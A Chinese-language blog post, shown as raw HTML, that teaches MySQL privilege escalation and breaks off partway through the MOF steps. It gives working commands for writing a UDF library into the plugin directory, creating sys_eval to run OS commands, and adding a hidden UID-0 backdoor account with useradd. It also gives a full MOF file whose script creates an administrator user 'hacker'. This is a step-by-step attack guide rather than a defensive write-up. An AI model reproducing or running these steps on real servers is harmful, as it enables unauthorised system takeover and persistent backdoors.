

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="https://avatars.githubusercontent.com/u/193379203?s=400&amp;u=0b52982067f8b5c236021fc6ebd137770c8942d9&amp;v=4">
  <link rel="icon" href="https://avatars.githubusercontent.com/u/193379203?s=400&amp;u=0b52982067f8b5c236021fc6ebd137770c8942d9&amp;v=4">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="John Doe">
  <meta name="keywords" content="">
  
    <meta name="description" content="MySQL有很多内置函数提供给使用者，包括字符串函数、数值函数、日期和时间函数等，给开发人员和使用者带来了很多方便 UDF介绍MySQL的内置函数虽然丰富，但毕竟不能满足所有人的需要，有时候我们需要对表中的数据进行一些处理而内置函数不能满足需要的时候，就需要对MySQL进行一些扩展，幸运的是，MySQL给使用者提供了添加新函数的机制，这种使用者自行添加的MySQL函数就称为UDF(User Def">
<meta property="og:type" content="article">
<meta property="og:title" content="数据库提权">
<meta property="og:url" content="http://example.com/2025/01/06/%E6%95%B0%E6%8D%AE%E5%BA%93%E6%8F%90%E6%9D%83/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="MySQL有很多内置函数提供给使用者，包括字符串函数、数值函数、日期和时间函数等，给开发人员和使用者带来了很多方便 UDF介绍MySQL的内置函数虽然丰富，但毕竟不能满足所有人的需要，有时候我们需要对表中的数据进行一些处理而内置函数不能满足需要的时候，就需要对MySQL进行一些扩展，幸运的是，MySQL给使用者提供了添加新函数的机制，这种使用者自行添加的MySQL函数就称为UDF(User Def">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061648772.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061648758.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061648764.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061648780.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061648781.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061648777.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061648059.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061648069.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061648078.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061648090.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061648119.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061648145.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061648363.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061648419.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061648401.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061648461.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061648451.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061648508.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061648724.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061648793.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061648790.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061648855.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061648883.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061648005.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061648086.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061648130.png">
<meta property="article:published_time" content="2025-01-06T08:48:48.000Z">
<meta property="article:modified_time" content="2025-01-06T08:48:58.444Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061648772.png">
  
  
  
  <title>数据库提权 - Hexo</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>SLL779</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="数据库提权"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2025-01-06 16:48" pubdate>
          2025年1月6日 下午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          2.6k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          23 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">数据库提权</h1>
            
            
              <div class="markdown-body">
                
                <p>MySQL有很多内置函数提供给使用者，包括字符串函数、数值函数、日期和时间函数等，给开发人员和使用者带来了很多方便</p>
<h4 id="UDF介绍"><a href="#UDF介绍" class="headerlink" title="UDF介绍"></a>UDF介绍</h4><p>MySQL的内置函数虽然丰富，但毕竟不能满足所有人的需要，有时候我们需要对表中的数据进行一些处理而内置函数不能满足需要的时候，就需要对MySQL进行一些扩展，幸运的是，MySQL给使用者提供了添加新函数的机制，这种使用者自行添加的MySQL函数就称为UDF(User Define Function)。UDF机制能够起作用，必须使用C或者C++编写函数，你的系统必须支持动态加载,，mysql采用动态链接库加载自定义函数。</p>
<p>udf就是为了让我们开发者能够自己写方便自己函数，它有3种返回值，这三种分别是STRING，INTEGER，REAL</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs plain">STRING        字符型<br>INTEGER       整型<br>REAL          实数型<br></code></pre></td></tr></table></figure>

<p><strong>如下面的代码：</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs plain">#include &lt;mysql.h&gt;<br> extern &quot;C&quot; long long testadd(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error)<br>&#123;<br>int a = *((long long *)args-&gt;args[0]);<br>int b = *((long long *)args-&gt;args[1]);<br>return a + b;<br>&#125;<br>extern &quot;C&quot; my_bool testadd_init(UDF_INIT *initid, UDF_ARGS *args, char *message)<br>&#123;<br>return 0;<br>&#125;<br></code></pre></td></tr></table></figure>

<h3 id="UDF编写详解"><a href="#UDF编写详解" class="headerlink" title="UDF编写详解"></a>UDF编写详解</h3><h4 id="用户主函数"><a href="#用户主函数" class="headerlink" title="用户主函数"></a>用户主函数</h4><p>我们假设需要定义的函数名字为为xxx, 则我们的函数需要有参数列表和返回值, 这不能由用户随意指定, 是有固定规则的</p>
<p>返回值是STRING 类型或DECIMAL类型</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">char *xxx(UDF_INIT *initid, UDF_ARGS *args, char *result, unsigned long *length, char *is_null, char *error);<br></code></pre></td></tr></table></figure>

<p>返回值是INTEGER类型</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">long long xxx(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error);<br></code></pre></td></tr></table></figure>

<p>返回值是REAL类型</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">double xxx(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error);<br></code></pre></td></tr></table></figure>

<h4 id="系统内置函数"><a href="#系统内置函数" class="headerlink" title="系统内置函数"></a>系统内置函数</h4><p>在完成了用户定义的主函数以后, 还需要编写配套的系统内置函数</p>
<h5 id="xxx-init函数"><a href="#xxx-init函数" class="headerlink" title="xxx_init函数"></a>xxx_init函数</h5><p>这个函数会在自定义的xxx函数调用前被调用, 进行基本的初始化工作, 其完整定义如下，该函数的主要功能一般是分配空间, 函数参数检查的等. 如果不需要做任何操作, 直接返回0即可.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">my_bool xxx_init(UDF_INIT *initid, UDF_ARGS *args, char *message)<br></code></pre></td></tr></table></figure>

<p>返回值: 1代表出错, 可以在message中给出错误信息并且返回给客户端, 0表示正确执行</p>
<h5 id="xxx-deinit"><a href="#xxx-deinit" class="headerlink" title="xxx_deinit"></a>xxx_deinit</h5><p>该函数用于释放申请的空间, 其完整定义如下，该函数的功能主要是释放资源, 如果在xxx_init中申请了内存, 可以在此处释放, 该函数在用户函数xxx执行以后执行</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">void xxx_deinit(UDF_INIT *initid);<br></code></pre></td></tr></table></figure>

<h4 id="执行流程"><a href="#执行流程" class="headerlink" title="执行流程"></a>执行流程</h4><p>调用xxx_init来初始化, 并申请内存空间用于存储结果</p>
<p>调用xxx</p>
<p>调用xxx_deinit释放空间</p>
<h3 id="运行自己的UDF"><a href="#运行自己的UDF" class="headerlink" title="运行自己的UDF"></a>运行自己的UDF</h3><h4 id="编写C-C-代码"><a href="#编写C-C-代码" class="headerlink" title="编写C&#x2F;C++代码"></a>编写C&#x2F;C++代码</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs plain">#include &lt;mysql.h&gt;<br> extern &quot;C&quot; long long testadd(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error)<br>&#123;<br>int a = *((long long *)args-&gt;args[0]);<br>int b = *((long long *)args-&gt;args[1]);<br>return a + b;<br>&#125;<br>extern &quot;C&quot; my_bool testadd_init(UDF_INIT *initid, UDF_ARGS *args, char *message)<br>&#123;<br>return 0;<br>&#125;<br></code></pre></td></tr></table></figure>

<h4 id="生成动态链接库"><a href="#生成动态链接库" class="headerlink" title="生成动态链接库"></a>生成动态链接库</h4><p>动态链接提供了一种方法，使进程可以调用不属于其可执行代码的函数。函数的可执行代码位于一个 DLL 文件中，该 DLL 包含一个或多个已被编译、链接并与使用它们的进程分开存储的函数。DLL 还有助于共享数据和资源。多个应用程序可同时访问内存中单个 DLL 副本的内容。windows是dll文件，linux是so文件</p>
<p>windows使用</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">使用vs创建dll文件即可<br></code></pre></td></tr></table></figure>

<p>linux</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">g++ -shared -fPIC -I /usr/include/mysql -o udf.so udf.cpp<br></code></pre></td></tr></table></figure>

<h4 id="上传到目标机器"><a href="#上传到目标机器" class="headerlink" title="上传到目标机器"></a>上传到目标机器</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs plain">1、mysql&lt;5.0,路径随意<br>3、5.0&lt;=MYsql&lt;5.1， 放置系统目录（system32） C:\Windows\system32<br>2、mysql&gt;5.1，udf.dll文件必须放置在mysql安装目录的lib\plugin文件夹下，(lib\plugin目录默认不存在，需自行创建)<br></code></pre></td></tr></table></figure>

<h4 id="创建函数"><a href="#创建函数" class="headerlink" title="创建函数"></a>创建函数</h4><p>函数名字必须和源码中一样</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">create function 函数名 returns string soname &quot;udf.dll&quot;;<br></code></pre></td></tr></table></figure>

<p>查询是否导入成功</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">select * from mysql.func;<br></code></pre></td></tr></table></figure>

<h4 id="执行函数"><a href="#执行函数" class="headerlink" title="执行函数"></a>执行函数</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">select  函数名（参数）;<br></code></pre></td></tr></table></figure>

<h3 id="提权准备"><a href="#提权准备" class="headerlink" title="提权准备"></a>提权准备</h3><h4 id="连接mysql"><a href="#连接mysql" class="headerlink" title="连接mysql"></a>连接mysql</h4><p>连接mysql的方式很多，比如拿到了webshell，或者通过暴力破解的方式，udf提权第一步就是先连接mysql</p>
<h4 id="查询运行权限"><a href="#查询运行权限" class="headerlink" title="查询运行权限"></a>查询运行权限</h4><p>为什么要查询运行权限呢？因为我们udf本质上不是提权，是通过当前mysql的运行权限去执行系统命令，如果mysql运行权限太低的话就无法执行。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">select users(); 错误的<br></code></pre></td></tr></table></figure>

<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061648772.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<h4 id="查询软件版本"><a href="#查询软件版本" class="headerlink" title="查询软件版本"></a>查询软件版本</h4><p>为什么要查询版本呢？因为不同版本的动态链接文件导入的地方不同</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">select version();<br></code></pre></td></tr></table></figure>

<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061648758.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<h4 id="查询系统位数"><a href="#查询系统位数" class="headerlink" title="查询系统位数"></a>查询系统位数</h4><p>为什么要查询系统位数呢？不同的系统和位数有不同的动态连接文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">show variables like &#x27;%compile%&#x27;;<br></code></pre></td></tr></table></figure>

<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061648764.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<h4 id="查询读写权限"><a href="#查询读写权限" class="headerlink" title="查询读写权限"></a>查询读写权限</h4><p>为什么要查询读写权限呢？因为我们要将动态连接文件导入到相应的目录里</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">show global variables like &#x27;secure%&#x27;;<br></code></pre></td></tr></table></figure>

<p>secure_file_priv 是用来限制 load dumpfile、into outfile、load_file() 函数在哪个目录下拥有上传或者读取文件的权限，一般三种情况</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs plain">show global variables like &#x27;secure%&#x27;;  查询<br>secure_file_priv 的值为 NULL ，表示限制 mysqld 不允许导入|导出，此时无法提权<br>secure_file_priv 的值为 /tmp/ ，表示限制 mysqld 的导入|导出只能发生在 /tmp/ 目录下，此时也无法提权<br>secure_file_priv 的值没有具体值时，表示不对 mysqld 的导入|导出做限制，此时可提权<br></code></pre></td></tr></table></figure>

<p>如果想要更改就要改my.cnf文件中配置 secure_file_priv&#x3D;’’</p>
<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061648780.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<h4 id="查看plugin目录位置"><a href="#查看plugin目录位置" class="headerlink" title="查看plugin目录位置"></a>查看plugin目录位置</h4><p>为什么要查询plugin？因为我们要将动态连接文件导入到此目录</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">show variables like &#x27;plugin%&#x27;;<br></code></pre></td></tr></table></figure>

<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061648781.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<h4 id="生成动态连接文件"><a href="#生成动态连接文件" class="headerlink" title="生成动态连接文件"></a>生成动态连接文件</h4><p>不用我们生成了，在sqlmap中已经存在，或者msf中也存在，我们只需要用就行了，不需要在去写源代码。</p>
<p>存在位置为，其中分为windows 和linux 版本 分别有32位和64位</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs plain">sqlmap/data/udf/mysql<br>metasploit-framework/data/exploits/mysql/<br></code></pre></td></tr></table></figure>

<h5 id="sqlmap"><a href="#sqlmap" class="headerlink" title="sqlmap"></a>sqlmap</h5><p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061648777.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>sqlmap中的是通过加密的，需要用解密脚本解密，解密脚本在 &#x2F;sqlmap&#x2F;extra&#x2F;cloak&#x2F;cloak.py</p>
<p><strong>用法如下：</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">python cloak.py -d -i lib_mysqludf_sys.so_(sqlmap中的加密动态连接文件)<br></code></pre></td></tr></table></figure>

<h5 id="MSF"><a href="#MSF" class="headerlink" title="MSF"></a>MSF</h5><p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061648059.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<h3 id="提权步骤"><a href="#提权步骤" class="headerlink" title="提权步骤"></a>提权步骤</h3><h4 id="建表"><a href="#建表" class="headerlink" title="建表"></a>建表</h4><p><strong>创建一张临时表用来存放DLL&#x2F;OS文件的16进制内容</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">CREATE TABLE temp_udf (udf blob);<br></code></pre></td></tr></table></figure>

<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061648069.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<h4 id="插入"><a href="#插入" class="headerlink" title="插入"></a>插入</h4><p>其中<em>binaryCode</em>为已经转换好的十六进制内容,<strong>binaryCode前加0X</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">INSERT into temp_udf values (CONVERT($binaryCode,CHAR));<br></code></pre></td></tr></table></figure>

<p><strong>转化成16进制方法很多，我么借助mysql</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">select hex(load_file(&#x27;C:/udf.dll&#x27;)) into dumpfile &#x27;c:/udf.txt&#x27;<br></code></pre></td></tr></table></figure>

<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061648078.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<h4 id="导出"><a href="#导出" class="headerlink" title="导出"></a>导出</h4><p><strong>选择对应的地方进行导出</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">SELECT udf FROM temp_udf INTO DUMPFILE &quot;导入到固定的目录下，之前查的地方，符号要加转义字符&quot;<br></code></pre></td></tr></table></figure>

<h4 id="创建函数-1"><a href="#创建函数-1" class="headerlink" title="创建函数"></a>创建函数</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">create function sys_eval returns string soname &#x27;udf.os&#x27;;<br></code></pre></td></tr></table></figure>

<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061648090.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<h4 id="执行"><a href="#执行" class="headerlink" title="执行"></a>执行</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">select sys_eval(&quot;whoami&quot;);<br></code></pre></td></tr></table></figure>

<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061648119.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p><strong>创建后门</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">select sys_eval(&quot;useradd -p `openssl passwd -1 -salt &#x27;salt&#x27; 123456` guest -o -u 0 -g root -G root -s /bin/bash -d /home/test&quot;);<br></code></pre></td></tr></table></figure>

<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061648145.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<h2 id="MySQL-MOF提权"><a href="#MySQL-MOF提权" class="headerlink" title="MySQL-MOF提权"></a>MySQL-MOF提权</h2><h3 id="MOF介绍"><a href="#MOF介绍" class="headerlink" title="MOF介绍"></a>MOF介绍</h3><p>mof是windows系统的一个“托管对象格式”文件（位置：c:&#x2F;windows&#x2F;system32&#x2F;wbem&#x2F;mof&#x2F;），其作用是每隔五秒就会去监控进程创建和死亡，mof目录下有两个文件夹（good与bad）。windows server 2003及以下系统每5秒会执行一次mof目录下的文件，执行成功会移动到good文件夹，执行失败移动到bad文件夹。</p>
<h3 id="MOF提权原理"><a href="#MOF提权原理" class="headerlink" title="MOF提权原理"></a>MOF提权原理</h3><p>mof提权其实就是利用mysql 写入mof文件，通过mof文件中的vbs脚本以system权限执行系统命令</p>
<p>使用条件如下：</p>
<p>1、mysql是高权限运行</p>
<p>2、mysql需要具有导入导出功能</p>
<p>2、只能用于2003以下的系统（2003以上的系统不在使用该目录）</p>
<p>提权脚本如下：执行一段vbs语言，执行系统命令</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><code class="hljs plain">#pragma namespace(&quot;\\\\.\\root\\subscription&quot;)instance of __EventFilter as $EventFilter<br>&#123;<br>EventNamespace = &quot;Root\\Cimv2&quot;;<br>Name  = &quot;filtP2&quot;;<br>Query = &quot;Select * From __InstanceModificationEvent &quot;<br>&quot;Where TargetInstance Isa \&quot;Win32_LocalTime\&quot; &quot;<br>&quot;And TargetInstance.Second = 5&quot;;<br>QueryLanguage = &quot;WQL&quot;;<br>&#125;;instance of ActiveScriptEventConsumer as $Consumer<br>&#123;<br>Name = &quot;consPCSV2&quot;;<br>ScriptingEngine = &quot;JScript&quot;;<br>ScriptText =<br>&quot;var WSH = new ActiveXObject(\&quot;WScript.Shell\&quot;)\nWSH.run(\&quot;net.exe user hacker P@ssw0rd /add\&quot;)\nWSH.run(\&quot;net.exe localgroup administrators hacker /add\&quot;)&quot;;<br>&#125;;instance of __FilterToConsumerBinding<br>&#123;<br>Consumer   = $Consumer;<br>Filter = $EventFilter;<br>&#125;;<br></code></pre></td></tr></table></figure>

<h3 id="MOF提权步骤"><a href="#MOF提权步骤" class="headerlink" title="MOF提权步骤"></a>MOF提权步骤</h3><p>和UDF提权一样，将文件转成二进制然后利用导出函数，导出到对应的目录，然后等待提权即可</p>
<p>1、创建一个表格</p>
